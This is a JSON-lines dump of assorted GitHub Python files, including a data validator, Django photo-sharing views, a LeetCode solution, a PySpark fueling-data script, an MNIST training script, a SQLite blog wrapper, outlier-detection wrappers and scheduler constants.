:param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid file path.\n :type\tBoolean\n \"\"\"\n\n if parameterValue is None:\n return False\n elif(ValidateData.funcIsValidString(parameterValue)):\n return os.path.exists(parameterValue)\n return False\n\n #Tested 5\n @staticmethod\n def funcIsValidClass(parameterValue, strCorrectName):\n \"\"\"\n Validates a parameter as a valid class (of a specifc type given by name).\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :param\tstrCorrectName:\tName of te class the parameter should be.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if(parameterValue==None):\n return False\n if not ValidateData.funcIsValidString(strCorrectName):\n return False\n classType = type(parameterValue).__name__\n if(classType == strCorrectName):\n return True\n if(classType == 'instance'):\n if(parameterValue.__class__.__name__==strCorrectName):\n return True\n else:\n return False\n return False\n","repo_name":"SegataLab/lefse","sub_path":"lefsebiom/ValidateData.py","file_name":"ValidateData.py","file_ext":"py","file_size_in_byte":17768,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"6"} +{"seq_id":"24309552973","text":"from django.contrib.auth.models import User\nfrom django.db.models import Case, When\nfrom django.http import Http404, JsonResponse, HttpResponseBadRequest\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.views import generic as views\nfrom django.views.generic.base import ContextMixin\nfrom django.template import loader\n\n\nfrom django.contrib.auth import mixins as auth_mixins\n\nfrom devstagram.async_chat.models import ChatRoom, PostMessage\nfrom devstagram.async_chat.utils.room_create import create_room\nfrom devstagram.mainsite.forms import PictureUploadForm, FriendRequestForm, FriendshipForm, PictureUpdateForm, \\\n CommentForm, ProfilePictureUploadForm\nfrom devstagram.mainsite.models import Picture, FriendRequest, Like, Friendship, Comment, ProfilePicture, UserFriends\n\nfrom itertools import chain\n\n\ndef get_pictures():\n queryset = Picture.objects.order_by('-upload_date')\n return queryset\n\n\nclass WelcomePage(views.View):\n def get(self, request, *args, **kwargs):\n return render(request, 'landing_page.html')\n\n\nclass IndexView(views.ListView):\n template_name = 'index.html'\n context_object_name = 'pictures'\n\n def get_queryset(self):\n self.queryset = get_pictures()\n return self.queryset\n\n\nclass PictureUploadView(views.CreateView):\n model = Picture\n form_class = PictureUploadForm\n template_name = 'picture_upload.html'\n success_url = reverse_lazy('index')\n\n def form_valid(self, form):\n picture = form.save(commit=False)\n picture.user = self.request.user\n return super().form_valid(form)\n\n\nclass LikePicture(auth_mixins.LoginRequiredMixin, ContextMixin, views.View):\n def get(self, request, *args, **kwargs):\n picture = Picture.objects.get(pk=kwargs['pk'])\n user_id_list = picture.likes_as_flat_list()\n action = None\n user = request.user\n if user.id not in user_id_list:\n like = Like(picture_id=picture.id, user_id=user.id)\n like.save()\n action = 'like'\n else:\n like = Like.objects.get(picture_id=picture.id, user_id=user.id)\n like.delete()\n action = 'unlike'\n likes = 
Like.objects.filter(picture_id=picture.id).count()\n # pictures = get_pictures(user)\n pictures = Picture.objects.filter(pk=kwargs['pk'])\n\n template = loader.render_to_string(\n template_name='index.html',\n context={'pictures': pictures},\n request=self.request, using=None)\n\n return JsonResponse(data={'template': template,\n 'context': {\n 'likes': likes,\n 'user_id': user.id,\n 'id_list': list(user_id_list),\n 'action': action\n }\n })\n\n\nclass ProfileView(views.DetailView):\n model = User\n template_name = 'profile.html'\n slug_url_kwarg = 'slug'\n\n def get_object(self, queryset=None):\n return User.objects.get(username=self.kwargs.get('slug'))\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n user = self.get_object()\n request_user = self.request.user\n try:\n profile_picture = ProfilePicture.objects.get(user=self.get_object())\n except(Exception) as ex:\n profile_picture = ProfilePicture(user=self.get_object())\n profile_picture.image = 'pictures/default.png'\n profile_picture.save()\n\n if not self.request.user.is_anonymous:\n friendship = Friendship.objects.filter(friend_one_id=user.id, friend_two_id=request_user.id) | \\\n Friendship.objects.filter(friend_one_id=request_user.id, friend_two_id=user.id)\n\n is_friend_request_sent = FriendRequest.objects.filter(sender=request_user, receiver=user).exists()\n context['friendship'] = True if friendship else False\n context['is_friend_request_sent'] = is_friend_request_sent\n\n friends = (Friendship.objects.filter(friend_one=user) | Friendship.objects.filter(\n friend_two=user)).values_list('friend_one_id', 'friend_two_id')\n friends_id = set(chain(*friends))\n if user.id in friends_id:\n friends_id.remove(user.id)\n\n friends = User.objects.filter(id__in=friends_id)\n\n context['friends'] = friends\n context['pictures'] = Picture.objects.filter(user=user)\n context['profile_picture'] = profile_picture\n return context\n\n\nclass FriendRequestView(auth_mixins.LoginRequiredMixin, views.View):\n template_name = 'profile.html'\n success_url = 'index'\n\n def post(self, request, *args, **kwargs):\n form = FriendRequestForm()\n fr = form.save(commit=False)\n sender = User.objects.get(username=request.POST['sender'])\n receiver = User.objects.get(username=request.POST['receiver'])\n\n try:\n friend_request = FriendRequest.objects.get(sender=sender, receiver=receiver)\n friend_request.delete()\n\n except FriendRequest.DoesNotExist:\n fr.sender = sender\n fr.receiver_id = receiver.id\n fr.save()\n return redirect('profile', receiver)\n\n\nclass CreateFriendship(views.View):\n template_name = 'profile.html'\n\n def post(self, request, *args, **kwargs):\n form = FriendshipForm()\n friendship = form.save(commit=False)\n sender_username = request.POST['sender']\n receiver_username = request.POST['receiver']\n sender = User.objects.get(username=sender_username)\n receiver = User.objects.get(username=receiver_username)\n sender_friends, created = UserFriends.objects.get_or_create(user=sender)\n receiver_friends, created = UserFriends.objects.get_or_create(user=receiver)\n\n if request.POST['answer'] == 'accepted':\n friendship.friend_one = sender\n friendship.friend_two = receiver\n friendship.save()\n sender_friends.friends += 1\n receiver_friends.friends += 1\n sender_friends.save()\n receiver_friends.save()\n\n request_to_remove = FriendRequest.objects.get(sender=sender, receiver=receiver)\n request_to_remove.delete()\n\n return redirect('index')\n\n\nclass PictureDisplayView(views.DetailView):\n model 
= Picture\n template_name = 'picture_display.html'\n slug_url_kwarg = 'slug'\n\n def get_object(self, queryset=None):\n picture = Picture.objects.get(pk=self.kwargs.get('pk'))\n return picture\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n picture = self.get_object()\n form = CommentForm()\n comments = Comment.objects.filter(picture_id=picture.id)\n context['picture'] = picture\n context['form'] = form\n context['comments'] = comments\n return context\n\n\nclass PictureEditView(views.View):\n\n def get(self, request, *args, **kwargs):\n pk = kwargs.get('pk')\n picture = Picture.objects.get(pk=pk)\n if request.user.id != picture.user_id:\n raise Http404('Access denied')\n form = PictureUpdateForm(instance=picture)\n context = {'pk': pk, 'form': form, 'picture': picture}\n return render(request, 'picture_edit.html', context)\n\n def post(self, request, *args, **kwargs):\n pk = kwargs.get('pk')\n picture = Picture.objects.get(pk=pk)\n form = PictureUpdateForm(request.POST, request.FILES, instance=picture)\n if form.is_valid():\n edited_form = form.save(commit=False)\n if not request.FILES:\n edited_form.picture = picture.picture\n\n edited_form.user_id = request.user.id\n edited_form.save()\n return redirect('index')\n\n\nclass PictureDeleteView(views.DeleteView):\n model = Picture\n template_name = 'picture_display.html'\n success_url = reverse_lazy('index')\n\n def get(self, request, *args, **kwargs):\n return HttpResponseBadRequest('Not allowed')\n\n\nclass CommentPictureView(auth_mixins.LoginRequiredMixin, views.View):\n template_name = 'picture_display.html'\n\n def post(self, request, *args, **kwargs):\n picture_id = request.POST['pic_id']\n form = CommentForm(request.POST)\n comment = form.save(commit=False)\n comment.user = request.user\n comment.picture_id = picture_id\n comment.save()\n\n picture = Picture.objects.get(pk=picture_id)\n comments = Comment.objects.filter(picture_id=picture.id)\n context = {\n 'form': CommentForm,\n 'comments': comments,\n 'picture': picture\n }\n return redirect('picture display', picture.user, picture_id)\n\n\nclass DeleteCommentView(views.DeleteView):\n model = Comment\n\n def get_success_url(self):\n pk = self.request.POST['pic-pk']\n username = self.get_object().user.username\n print(username, 'username')\n return reverse_lazy('picture display', kwargs={'slug': username, 'pk': pk})\n\n\nclass ProfilePictureUploadView(views.View):\n template_name = 'profile_picture.html'\n\n def get(self, request, *args, **kwargs):\n current_picture = ProfilePicture.objects.get(user=request.user)\n form = ProfilePictureUploadForm()\n context = {\n 'form': form,\n 'currentpfp': current_picture\n }\n\n return render(request, 'profile_picture.html', context)\n\n def post(self, request, *args, **kwargs):\n current_picture = ProfilePicture.objects.get(user=request.user)\n form = ProfilePictureUploadForm(request.POST, request.FILES, instance=current_picture)\n if not request.FILES:\n return redirect('profile', request.user.username)\n if form.is_valid():\n picture = form.save(commit=False)\n\n old_picture = ProfilePicture.objects.get(user=request.user)\n if not str(old_picture.image).split('/')[1] == 'default.png':\n old_picture.image.delete()\n\n picture.picture = request.FILES['image']\n picture.user = request.user\n picture.save()\n return redirect('profile', request.user.username)\n\n\nclass SearchView(views.ListView):\n template_name = 'search.html'\n context_object_name = 'searched_users_all_likes'\n\n def get_users(self, 
users):\n all_likes = []\n for user in users:\n likes = 0\n for pic in user.picture_set.all():\n likes += len(pic.likes_as_flat_list())\n all_likes.append(likes)\n zipped_list = list(zip(users, all_likes))\n return zipped_list\n\n def get_queryset(self):\n search = self.request.GET['q']\n users = User.objects.filter(username__icontains=search)\n self.queryset = self.get_users(users)\n\n # Sort the queryset\n try:\n order = self.request.GET['order']\n except MultiValueDictKeyError:\n order = 'date-joined-asc'\n if order == 'likes-desc':\n return sorted(self.queryset, key=lambda x: -x[1])\n elif order == 'likes-asc':\n return sorted(self.queryset, key=lambda x: x[1])\n\n elif order == 'posts-asc':\n return sorted(self.queryset, key=lambda x: x[0].picture_set.count())\n elif order == 'posts-desc':\n return sorted(self.queryset, key=lambda x: x[0].picture_set.count(), reverse=True)\n\n elif 'friends' in order:\n users_ids = [user.id for user in users]\n if order == 'friends-desc':\n userfriends = UserFriends.objects.filter(user_id__in=users_ids).order_by('-friends')\n else:\n userfriends = UserFriends.objects.filter(user_id__in=users_ids).order_by('friends')\n\n sorted_user_ids = [user.user_id for user in userfriends]\n preserved = Case(*[When(pk=pk, then=pos) for pos, pk in enumerate(sorted_user_ids)])\n users = User.objects.filter(pk__in=sorted_user_ids).order_by(preserved)\n\n elif order == 'date-joined-desc':\n users = users.order_by('-date_joined')\n\n elif order == 'date-joined-asc':\n users = users.order_by('date_joined')\n\n self.queryset = self.get_users(users)\n return self.queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['q'] = self.request.GET['q']\n return context\n\n\nclass SendPostViaMessage(views.View):\n\n def post(self, request, *args, **kwargs):\n pk = int(request.POST['send-to'])\n sender = request.user\n receiver = User.objects.get(pk=pk)\n chatroom = create_room(sender.username, receiver.username)\n chatroom = chatroom['chatroom']\n pic_pk = request.POST['pic-pk']\n picture = Picture.objects.get(pk=pic_pk)\n owner = picture.user\n msg = PostMessage(chatroom=chatroom, sender=sender, post_owner=owner, post_image=picture)\n msg.save()\n chatroom.update_last_msg_time()\n return redirect('index')\n","repo_name":"gpavlov21/Devstagram","sub_path":"devstagram/devstagram/mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"40966829322","text":"#\n# @lc app=leetcode id=347 lang=python3\n#\n# [347] Top K Frequent Elements\n#\n\n# @lc code=start\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n hashmap = {}\n for num in nums:\n hashmap[num] = hashmap.get(num, 0) + 1\n \n freq = [[] for i in range(len(nums) + 1)]\n\n for n, c in hashmap.items():\n freq[c].append(n)\n \n ans = []\n for i in range(len(freq)-1, -1, -1):\n for j in freq[i]:\n if k > 0:\n ans.append(j)\n k -= 1\n return ans\n\n\n# Notes (6/5/2023)\n\n# Potential solution: Use max heap\n# For each element, count the number of occurrences and put them in a set\n# We don’t have to sort the whole hashmap because we only want the top k elements\n# Heapify() can be done in linear time\n# Each pop will be O(logn)\n# So, the time complexity is O(k*logn)\n\n# Solution in linear time:\n# Use an array where the position represents a count and the value represent the number\n# Notice that the size of the 
array is bounded to n where n is the number of elements in the input\n# time complexity: O(n)\n# space complexity: O(n)\n# - Array and hashmap to count the occurrences of each value\n\n \n# @lc code=end\n\n","repo_name":"saki-imai-1204/leetcode","sub_path":"code/347.top-k-frequent-elements.py","file_name":"347.top-k-frequent-elements.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27211812799","text":"import pytest\n\nfrom practice_atcoder.book_algorithm_solution.chapter3.takusannosuusiki import question\n\n\n# AtCoder Beginner Contest 051 B - Sum of Three Integers.\nclass Test(object):\n @pytest.mark.parametrize(\"s,expect\", [\n (\"125\", \"176\"),\n (\"9999999999\", \"12656242944\")\n ])\n def test(self, s, expect):\n assert question(s) == expect\n","repo_name":"powerpenguincat/practice-atcoder","sub_path":"tests/book_algorithm_solution/chapter3/test_takusannosuusiki.py","file_name":"test_takusannosuusiki.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5459684630","text":"# 載入函式庫\nfrom pyspark.sql import *\nfrom pyspark.sql.types import IntegerType\nfrom pyspark.sql.functions import *\n\n# 讀入資料\ndfSql = sqlContext.read.csv(\"Ubus215.csv\", header=True)\n\n# 變更資料型態\ndfSql = dfSql.withColumn(\"Qty\", dfSql[\"Qty\"].cast(IntegerType()))\ndfSql = dfSql.withColumn(\"TDate\", to_date(dfSql[\"TDate\"], \"yyyyMMdd\").cast(\"date\"))\n\n\n# 取出客戶代號\nlistCustomer = dfSql.select(\"CusAUnt\").distinct().collect()\n# 取出車輛牌照號碼\nlistCar = dfSql.select(\"CarNo\").distinct().collect()\n\n# 取出加油站代號\nlistStd = dfSql.select(\"StdNo\").distinct().collect()\n\n# 取出加油日期\nlistTdate = dfSql.select(\"TDate\").distinct().sort(dfSql[\"TDate\"])\n\nyearRange = []\nRange = []\n\nfor idxItem in listTdate.collect():\n idxItem[0].year\n idxItem[0].month\n idxItem[0].day\n\n# 取出車輛的加油地點\nfor idxCar in range(len(listCar)):\n print(idxCar, listCar[idxCar][0])\n dfSql.where(dfSql[\"CarNo\"] == listCar[idxCar][0]).select('StdNo').distinct().collect()\n dfSql.where(dfSql[\"CarNo\"] == listCar[idxCar][0]).select(\"Qty\").toPandas().sum()\n\ndateFrom = \"2016-03-01\"\ndateTo = \"2016-03-10\"\n\n# 取出車輛的加油地點,有打錨點\nfor idxCar in range(len(listCar)):\n # print(idxCar, listCar[idxCar][0])\n tmpDfSql = dfSql.where(dfSql[\"CarNo\"] == listCar[idxCar][0]).persist()\n # tmpDfSql.select('StdNo').distinct().collect()\n # tmpDfSql.select(\"Qty\").toPandas().sum()\n # tmpDfSql.where((tmpDfSql[\"TDate\"] >= dateFrom) & (tmpDfSql[\"TDate\"] <= dateTo)).collect()\n # tmpDfSql.select(tmpDfSql[\"TDate\"]).distinct().show()\n # tmpDfSql.select(tmpDfSql[\"TDate\"]).distinct().orderBy(tmpDfSql[\"TDate\"]).show()\n\n\n","repo_name":"marsywhuang/gasStation","sub_path":"parser215.py","file_name":"parser215.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"17466219942","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: mnist-disturb.py\n# Author: Yuxin Wu \n\nimport numpy as np\nimport tensorflow as tf\nimport os, sys\nimport argparse\n\nfrom tensorpack import *\nfrom disturb import DisturbLabel\n\nimport imp\nmnist_example = imp.load_source('mnist_example',\n os.path.join(os.path.dirname(__file__), '..', 'mnist-convnet.py'))\nget_config = mnist_example.get_config\n\ndef get_data():\n dataset_train = 
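The notes in the Top K Frequent Elements record above describe a heap-based alternative but give no code for it. A minimal sketch of that approach (illustrative only, not part of any dataset record; negated counts emulate a max-heap on top of Python's min-heap heapq):

import heapq
from collections import Counter

def top_k_frequent_heap(nums, k):
    counts = Counter(nums)                       # O(n) occurrence count
    heap = [(-c, n) for n, c in counts.items()]  # negate counts for max-heap ordering
    heapq.heapify(heap)                          # heapify runs in linear time
    return [heapq.heappop(heap)[1] for _ in range(k)]  # k pops at O(log n) each

# Example: top_k_frequent_heap([1, 1, 1, 2, 2, 3], 2) == [1, 2]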
BatchData(DisturbLabel(dataset.Mnist('train'), args.prob), 128)\n dataset_test = BatchData(dataset.Mnist('test'), 256, remainder=True)\n return dataset_train, dataset_test\nmnist_example.get_data = get_data\n\nIMAGE_SIZE = 28\n\nclass Model(mnist_example.Model):\n def _build_graph(self, input_vars):\n image, label = input_vars\n image = tf.expand_dims(image, 3)\n\n with argscope(Conv2D, kernel_shape=5, nl=tf.nn.relu):\n logits = (LinearWrap(image) # the starting brace is only for line-breaking\n .Conv2D('conv0', out_channel=32, padding='VALID')\n .MaxPooling('pool0', 2)\n .Conv2D('conv1', out_channel=64, padding='VALID')\n .MaxPooling('pool1', 2)\n .FullyConnected('fc0', 512, nl=tf.nn.relu)\n .FullyConnected('fc1', out_dim=10, nl=tf.identity)())\n prob = tf.nn.softmax(logits, name='prob')\n\n wrong = symbolic_functions.prediction_incorrect(logits, label)\n add_moving_summary(tf.reduce_mean(wrong, name='train_error'))\n\n cost = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, label)\n cost = tf.reduce_mean(cost, name='cross_entropy_loss')\n wd_cost = tf.mul(1e-5, regularize_cost('fc.*/W', tf.nn.l2_loss),\n name='regularize_loss')\n add_moving_summary(cost, wd_cost)\n\n self.cost = tf.add_n([wd_cost, cost], name='cost')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n parser.add_argument('--load', help='load model')\n parser.add_argument('--prob', help='disturb prob', type=float, required=True)\n args = parser.parse_args()\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n config = get_config()\n if args.load:\n config.session_init = SaverRestore(args.load)\n QueueInputTrainer(config).train()\n\n","repo_name":"jxwufan/NLOR_A3C","sub_path":"tensorpack/examples/DisturbLabel/mnist-disturb.py","file_name":"mnist-disturb.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"31355281666","text":"class ALumno:\n nombre = None\n nota = None\n\n def __init__(self,nombre, nota):\n self.nombre = nombre\n self.nota = nota\n def imprimirNota(self):\n print(self.nota)\n def EstaAprobado(self):\n if (self.nota < 4):\n return False\n else:\n return True\n \nALumno = ALumno('Alex',8)\nALumno.imprimirNota()\nprint(ALumno.EstaAprobado())\n ","repo_name":"Franjj08/Python_BootCampus","sub_path":"ej6.2.py","file_name":"ej6.2.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21729775724","text":"import random\r\n\r\nparam_1 = random.randint(1,10)\r\nprint(param_1)\r\n\r\ndef game():\r\n while True:\r\n guess = input('Guess any number from 1 till 10: ')\r\n print('You have chosen ', guess)\r\n if 0 < int(guess) < 11 and int(guess) == param_1:\r\n print('Gongratulation!')\r\n break\r\n else:\r\n print('You are wrong! 
Try one more time!')\r\n            continue\r\nprint(game())","repo_name":"TheGurtang/Python","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"42424325073","text":"import sqlite3\nfrom Post import Post\nfrom Comment import Comment\n\n\nclass BlogDatabase:\n    def __init__(self, app):\n        self.__app = app\n\n    def connect(self):\n        if not hasattr(self, '__db_connection'):\n            db_connection = sqlite3.connect(self.__app.config['DATABASE_PATH'])\n            db_connection.row_factory = sqlite3.Row\n            self.__db_connection = db_connection\n            self.__cursor = self.__db_connection.cursor()\n\n    def close_connection(self):\n        if hasattr(self, '__db_connection'):\n            self.__db_connection.close()\n\n    def execute_script(self, script_name):\n        with self.__app.open_resource('db/sql/' + script_name, mode='r') as script_file:\n            self.__cursor.executescript(script_file.read())\n\n    @staticmethod\n    def __create_post_from_db_row(row):\n        return Post(row['post_id'], row['title'], row['short_description'], row['text'], row['publication_date'], row['img_url'])\n\n    def get_posts(self):\n        sql = 'SELECT post_id, title, short_description, text, publication_date, img_url FROM post'\n        self.__cursor.execute(sql)\n        post_rows = self.__cursor.fetchall()\n        posts = []\n        for post_row in post_rows:\n            post = self.__create_post_from_db_row(post_row)\n            posts.append(post)\n        return posts\n\n    def get_post_by_id(self, post_id):\n        sql = 'SELECT post_id, title, short_description, text, publication_date, img_url FROM post WHERE post_id = ?'\n        self.__cursor.execute(sql, (post_id,))\n        post_row = self.__cursor.fetchone()\n        if post_row:\n            post = self.__create_post_from_db_row(post_row)\n            return post\n        return None\n\n    @staticmethod\n    def __create_comment_from_db_row(row):\n        return Comment(row['comment_id'], row['post_id'], row['text'])\n\n    def get_comments_by_post_id(self, post_id):\n        sql = 'SELECT comment_id, post_id, text FROM comment WHERE post_id = ?'\n        self.__cursor.execute(sql, (post_id,))\n        comment_rows = self.__cursor.fetchall()\n        comments = []\n        for comment_row in comment_rows:\n            comment = self.__create_comment_from_db_row(comment_row)\n            comments.append(comment)\n        return comments\n\n    def add_comment_to_post_by_post_id(self, comment_text, post_id):\n        sql = 'INSERT INTO comment (post_id, text) VALUES (?, ?)'\n        self.__cursor.execute(sql, (post_id, comment_text))\n        self.__db_connection.commit()","repo_name":"fedosovmu/BlogFlask","sub_path":"BlogDatabase.py","file_name":"BlogDatabase.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"26664212255","text":"from abc import abstractmethod\n\nfrom ir.ir_exceptions import LabelsNotAvailable\nfrom ir.ir_operations import IROp, IROpOptions\nfrom ir.ir_parameters import IRNumPar\n\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.neighbors import LocalOutlierFactor\nfrom sklearn.svm import OneClassSVM\nimport numpy as np\nimport pandas as pd\n\n\nclass IROutliersDetection(IROp):\n    def __init__(self, name, parameters = None, model = None):\n        super(IROutliersDetection, self).__init__(name,parameters if parameters is not None else [])\n        if parameters!=None:\n            self._model = model(**{v.name: v.value for v in parameters})\n        self.labels = None\n\n    def parameter_tune(self, dataset):\n        pass\n\n    def set_model(self, result):\n        if 'transformed_ds' in result:\n            dataset = result['transformed_ds']\n        elif 'new_dataset' in result:\n            dataset = 
result['new_dataset']\n else:\n dataset = result['original_dataset'].ds\n labels = result['labels']\n self.parameter_tune(dataset)\n for p,v in self.parameters.items():\n self._model.__setattr__(p,self.parameters[p].value)\n self._param_setted = True\n\n def get_labels(self):\n if self.labels is None:\n raise LabelsNotAvailable\n return self.labels\n\n #TDB cosa deve restituire questa funzione?\n def run(self, result, session_id, **kwargs):\n if not self._param_setted:\n self.set_model(result)\n\n if 'transformed_ds' in result:\n dataset = result['transformed_ds']\n elif 'new_dataset' in result:\n dataset = result['new_dataset']\n else:\n dataset = result['original_dataset'].ds\n if self.__class__.__name__!=\"IROutliersDetection\":\n print('PARAMETERS', self.parameters)\n result['predicted_outliers'] = self._model.fit_predict(dataset)\n mask_outliers = result['predicted_outliers'] == -1\n result['outliers_dataset'] = pd.DataFrame(dataset.values[mask_outliers, :])\n mask = result['predicted_outliers'] != -1\n result['noOutliers_dataset'] = pd.DataFrame(dataset.values[mask, :])\n result['labels'] = mask\n self._param_setted = False\n return result\n else:\n # TODO: è sbagliato, va sistemato\n result = IROneClassSVM().run(result, session_id)\n return result\n\n\nclass IRIsolationForest(IROutliersDetection):\n def __init__(self):\n super(IRIsolationForest, self).__init__(\"isolationForest\",\n [IRNumPar(\"contamination\", \"auto\", \"float\", 0, 0.5, 0.1)], # TODO: if I want to pass a list of values?\n IsolationForest)\n self._param_setted = False\n\n def parameter_tune(self, dataset):\n pass\n\nclass IRLocalOutlierFactor(IROutliersDetection):\n def __init__(self):\n super(IRLocalOutlierFactor, self).__init__(\"localOutlierFactor\",\n [IRNumPar(\"contamination\", \"auto\", \"float\", 0, 0.5, 0.1)], # TODO: if I want to pass a list of values?\n LocalOutlierFactor)\n self._param_setted = False\n\n def parameter_tune(self, dataset):\n pass\n\nclass IROneClassSVM(IROutliersDetection):\n def __init__(self):\n super(IROneClassSVM, self).__init__(\"oneClassSVM\",\n [IRNumPar(\"nu\", 0.01, \"float\", 0, 0.5, 0.1)], # TODO: if I want to pass a list of values?\n OneClassSVM)\n self._param_setted = False\n\n def parameter_tune(self, dataset):\n pass\n\nclass IRGenericOutliersDetection(IROpOptions):\n def __init__(self):\n super(IRGenericOutliersDetection, self).__init__([IROutliersDetection('outliersDetection'),IRIsolationForest(), IRLocalOutlierFactor(), IROneClassSVM()], \"oneClassSVM\")","repo_name":"DEIB-GECO/DSBot","sub_path":"DSBot/ir/impl/outliersDetection.py","file_name":"outliersDetection.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43468959610","text":"\"\"\"\nAll module related constants definitions in one place. It allows to modify values without changing the underlying code.\nHaving them at one place makes easier to manage. Also prevents redundant strings or numeric values.\n\n1. CONFIG_FILE = Scheduler configuration file path. This allows to place the configurations to different directory.\n2. The environment key should be used to acquire related configurations. Valid values [ENV_DEV, ENV_TEST, ENV_PROD]\n3. Information messages key should start from MSG\n4. Exception messages key should start from MSG_EX\n5. Error messages key should start from ERR_MSG\n6. All operations performed by scheduler, the key should start from OPERATION\n7. 
All statuses assigned by scheduler, the key should start from STATUS\n8. All default values used for scheduler operations, the key should start from DEFAULT\n\n\"\"\"\n\n# configs\nCONFIG_FILE = \"/config.yaml\"\nENV_DEV = \"DEV\"\nENV_TEST = \"TEST\"\nENV_PROD = \"PROD\"\n\n# messages\n# messages > Info\nMSG_CONFIG_LOADING = \"\\n(i) Loading scheduler configurations...\"\nMSG_CONFIG_LOADED = \"(i) Scheduler configurations loaded!\\n\"\nMSG_FILES_DOWNLOADED = \"(i) Files downloaded\"\nMSG_FILES_DOWNLOADING = \"\\n(i) Files downloading. Please wait...\"\nMSG_FILES_TRANSFERRING = \"\\n(i) Transferring files, please wait...\"\nMSG_FILES_TRANSFERRED = \"(i) Files transfer complete \"\nMSG_FILES_UPLOADED = \"(i) Files uploaded\"\nMSG_FILES_UPLOADING = \"\\n(i) Files uploading. Please wait...\"\nMSG_JOB_SCHEDULED = \"(i) Job has been scheduled and ready to start.\"\nMSG_NEXT_RUN_SCHEDULE = \"(i) Next job to run at {}, which is {} seconds from now\"\nMSG_JOB_STARTED = \"Scheduled jobs started and will run on schedule. (Print Estimated Time to Run (ETR)= {})\"\nMSG_SHUTTING_DOWN_SCHEDULER = \"(i) Shutting down scheduler...\"\nMSG_WAIT_UNTIL_SAFE_SHUTDOWN = \"(i) Waiting until safely shutdown. \" \\\n \"NOTE: This operation will complete all pending jobs and then shutdown.\"\nMSG_SHUTDOWN_SCHEDULER_RUNNING_ALL = \"(i) Running all pending jobs before shutting down scheduler...\"\nMSG_SCHEDULER_SHUTDOWN_COMPLETE = \"(i) Scheduler shutdown complete.\"\nMSG_FORCE_STOP = \"(i) Force stopping scheduler...\"\nMSG_SCHEDULER_INTERRUPTED = \"*** (><) Scheduler interrupted, trying to safely shutdown. \" \\\n \"All pending jobs will be executed immediately.\"\n# messages > exception\nMSG_EX_ILLEGAL_DOWNLOADER = \"(EX) Illegal downloader argument\"\nMSG_EX_ILLEGAL_UPLOADER = \"(EX) Illegal uploader argument\"\nMSG_EX_ILLEGAL_NOTIFIER = \"(EX) Illegal notifier argument\"\nMSG_EX_ILLEGAL_JOB = \"(EX) Illegal job argument\"\nMSG_EX_INVALID_SCHEDULE_CONFIG = \"(EX) Either 'every' or 'at' should be provided, \" \\\n \"not both. Job rejected due to invalid schedule configurations.\"\n# messages > Error\nERR_MSG_INVALID_CONFIGS = \"(X) *** Invalid configurations present, \" \\\n \"please resolve errors to be able to start scheduler ***\"\nERR_MSG_STARTUP = \"(X) *** Please fix configurations to initiate scheduler startup.\"\nERR_MSG_DIR_EMPTY = \"(X) Source and target directories are mandatory\"\nERR_MSG_ERR_DIR_EMPTY = \"(X) Error and output directories are mandatory\"\nERR_MSG_REMOTE_CFG_EMPTY = \"(X) Source host, username, secret are mandatory for remote\"\nERR_MSG_SCHEDULE_ACTION_EMPTY = \"(X) Schedule and action are mandatory\"\nERR_MSG_SMTP_INVALID = \"(X) Invalid SMTP or Email configurations\"\nERR_MSG_SCHEDULE_INVALID = \"(X) Invalid schedule configurations. 
